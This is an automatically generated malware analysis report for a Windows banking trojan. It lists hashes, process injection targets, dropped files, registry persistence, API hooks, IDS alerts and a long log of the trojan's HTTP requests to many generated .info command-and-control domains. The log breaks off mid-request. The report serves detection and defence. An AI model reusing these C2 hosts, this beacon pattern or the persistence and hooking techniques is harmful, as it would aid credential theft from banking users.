Gen.Variant.Zusy.Elzob.8654_b9c91e6e54

by malwarelabrobot on October 30th, 2017 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Zusy.Elzob.8654 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.8654 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: b9c91e6e540274fb4c32e2359947f11a
SHA1: 976d6625fde7531b16e9112486705a5af7c80a84
SHA256: 4d99339b48b0e668802a972f065cfce4280b531f17fe82d9d3e9e16c2126f63f
SSDeep: 6144:Wu kBmWicfSPyXTnkl r MHLt8TaggWQI9T1S0osk:WAmWip2TnGC MHL2mgiIF1S0
Size: 366080 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company:
Created at: 2011-10-01 20:32:05
Analyzed on: Windows7 SP1 32-bit


Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1504

The Trojan injects its code into the following process(es):

winlogon.exe:416
svchost.exe:580
svchost.exe:648
svchost.exe:700
svchost.exe:824
svchost.exe:864
taskhost.exe:872
svchost.exe:1048
svchost.exe:1156
svchost.exe:1280
Dwm.exe:1376
Explorer.EXE:1440
svchost.exe:1732
TPAutoConnect.exe:2160
conhost.exe:2168
svchost.exe:2560
conhost.exe:3500

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\System32\config\SOFTWARE (13651 bytes)
C:\Windows (4 bytes)
C:\Windows\AppPatch\rkousid.exe (2837 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59B4.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"10f5f7ed" = "YM3&}=—ZîÚ¹ªáZ`eÇh:UDÅ >üþ{ò:Ã’ 㬓š²©#ú;³³Ñšqr{¬´3A#jÆ’2r Ù9².²Ãt‚¾súžÂ2¡D’*ŒÛDö¶¬ƒj~ž2›©š’ ’î#nN¬dLRÛ«j¢avÜd~›Å Cò6ÂË‹S±ãR«9±iù,©ÖŠÉŠÁV‚B‚Žž¹êÊ~Ê|[뺛AC‹ùéì>aÆâ‘¤Ù{²âƒi ™ÒRKf‹¾ûÌúB™Š‚cN¾;ğÁÑDZ©4Fd1“[ŒËʱù«i A’ãƒjË ‰†üÓásñQ."

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ose00000.exe, , \??\C:\Windows\apppatch\rkousid.exe_, \??\C:\Windows\apppatch\rkousid.exe"

Dropped PE files

MD5 File path
d3597c940986dcd3006a6e1842eb809f c:\Windows\AppPatch\rkousid.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
GetMessageW
TranslateMessage
GetMessageA
SetThreadDesktop

The Trojan installs the following user-mode hooks in ntdll.dll:

ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 10772 11264 4.1629 fc0cd423f3f881a1185bb93dc30c0ae4
.rdata 16384 6854 7168 4.09717 526aed65adee6062a4e8fcd112ec97d5
.data 24576 358948 344064 4.69085 3a9bf21e68fab6de8397ac481ecc0134
.reloc 385024 2426 2560 2.26235 d1f6091abe33d1cf8411d933a5d13ecc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
b592848c6a8ae7b2fdca9bae1953384c
bcf3331a7355038fb176d96dc6553ee4
b39ea4f79232adb9949bb61cee025813

URLs


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET CNC Zeus Tracker Reported CnC Server group 4

Traffic

GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: jeperedi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:04 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: lyvamyda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:59 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kyfawoxa.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kefywiri.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:51 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kyfawoxa.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zusuhiri.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:21 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: bonacamy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:59 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: navotocu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:11 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:09 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gacehawy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:31 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xudohijy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sivydubu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xubusore.info


HTTP/1.1 200 OK
Date: Sun, 29 Oct 2017 17:10:22 GMT
Server: Apache
Set-Cookie: gvc=907vr2568426228828152; expires=Fri, 28-Oct-2022 17:10:22 GMT; Max-Age=157680000; path=/; domain=xubusore.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: masyfoti.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: lysugiro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zusuhiri.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:20 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: gatofusi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:58 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobirebu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wycokolo.info


HTTP/1.1 200 OK
Date: Sun, 29 Oct 2017 17:10:17 GMT
Server: Apache
Set-Cookie: gvc=901vr2568426178230944; expires=Fri, 28-Oct-2022 17:10:17 GMT; Max-Age=157680000; path=/; domain=wycokolo.info; HttpOnly
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wycokolo.info
Cookie: gvc=901vr2568426178230944


HTTP/1.1 200 OK
Date: Sun, 29 Oct 2017 17:11:14 GMT
Server: Apache
Content-Length: 51
Content-Type: text/html; charset=UTF-8
<html><head></head><body><!-- vbe --></body></html>


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zubisoda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:25 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: fobirebu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:46 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: kericura.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:27 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xutikexy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:35 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zyrivuro.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: zubisoda.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:26 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: xuxelixi.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycikoga.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rydofale.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: dixoxywy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: navotocu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:47 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: sikuvosy.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: typihyqa.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: foxihazo.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:32 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: naselyfu.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: rycukope.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: masyfoti.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:34 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: mavagyte.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:10:10 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: wekanila.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: masewyky.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:01 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)
Host: viwemata.info


HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sun, 29 Oct 2017 17:11:14 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close


GET /key.bin HTTP/1.1
Referer: hXXp://VVV.google.com
